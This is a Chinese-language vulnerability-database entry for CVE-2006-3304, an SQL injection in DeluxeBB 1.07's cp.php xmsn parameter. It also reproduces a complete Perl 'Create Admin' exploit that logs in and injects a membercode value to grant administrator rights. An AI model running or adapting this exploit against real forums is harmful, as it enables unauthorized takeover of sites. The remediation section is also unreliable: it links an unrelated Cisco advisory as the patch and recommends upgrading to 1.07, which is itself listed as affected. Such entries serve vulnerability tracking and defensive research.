CVE-2006-3304
CVSS7.5
发布时间 :2006-06-28 21:05:00
修订时间 :2011-03-07 21:38:18
NMCOE    

[原文]SQL injection vulnerability in cp.php in DeluxeBB 1.07 and earlier allows remote attackers to execute arbitrary SQL commands via the xmsn parameter.


[CNNVD]DeluxeBB cp.php 远程SQL注入漏洞(CNNVD-200606-563)

        DeluxeBB是一款基于PHP的论坛程序。
        DeluxeBB对用户请求的处理存在输入验证漏洞,远程攻击者可能利用此漏洞对服务执行SQL注入攻击,导致非授权访问控制数据库,获取服务的管理用户权限。
        DeluxeBB的用户控制面板cp.php脚本中存在SQL注入漏洞,允许用户通过在升级设置中注入查询更改访问级别,获得管理权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3304
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3304
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-563
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20813
(VENDOR_ADVISORY)  SECUNIA  20813
http://www.vupen.com/english/advisories/2006/2530
(UNKNOWN)  VUPEN  ADV-2006-2530
http://www.securityfocus.com/bid/18648
(UNKNOWN)  BID  18648
http://www.securityfocus.com/archive/1/archive/1/438342/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060625 DeluxeBB 1.07 Create admin Exploit
http://securitytracker.com/id?1016384
(UNKNOWN)  SECTRACK  1016384
http://xforce.iss.net/xforce/xfdb/27443
(UNKNOWN)  XF  deluxebb-cp-sql-injection(27443)
http://securityreason.com/securityalert/1180
(UNKNOWN)  SREASON  1180
http://milw0rm.com/exploits/1953
(UNKNOWN)  MILW0RM  1953

- 漏洞信息

DeluxeBB cp.php 远程SQL注入漏洞
高危 SQL注入
2006-06-28 00:00:00 2006-07-03 00:00:00
远程  
        DeluxeBB是一款基于PHP的论坛程序。
        DeluxeBB对用户请求的处理存在输入验证漏洞,远程攻击者可能利用此漏洞对服务执行SQL注入攻击,导致非授权访问控制数据库,获取服务的管理用户权限。
        DeluxeBB的用户控制面板cp.php脚本中存在SQL注入漏洞,允许用户通过在升级设置中注入查询更改访问级别,获得管理权限。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.cisco.com/warp/public/707/cisco-sa-20060628-wcs.shtml
        

- 漏洞信息 (1953)

DeluxeBB <= 1.07 (cp.php) Create Admin Exploit (EDBID:1953)
php webapps
2006-06-25 Verified
0 Hessam-x
N/A [点击下载]
#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;
 
 print q(
 ###########################################################
 #          DeluxeBB <= 1.07 Create Admin Exploit          # 
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; 
  exit();
 }
 
  
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



 # Login In DeluxeBB <= 1.07 Create Admin Exploit
 
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();

 $xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'misc.php',
 Content => [
 "sub" => "login",
 "name" => "$uname",
 "password" => "$passwd",
 "submit" => "Log-in",
 "redirect" => "",
 "expiry" => "990090909",
 ],);
 
  if($cookie_jar->as_string =~ /memberpw=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  print $cookie_jar->as_string;
  exit(); 
  }

  # Creat Admin :)

$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]
		

- 漏洞信息

26841
DeluxeBB cp.php xmsn Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-25 Unknow
2006-06-25 Unknow

- 解决方案

Upgrade to version 1.07 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站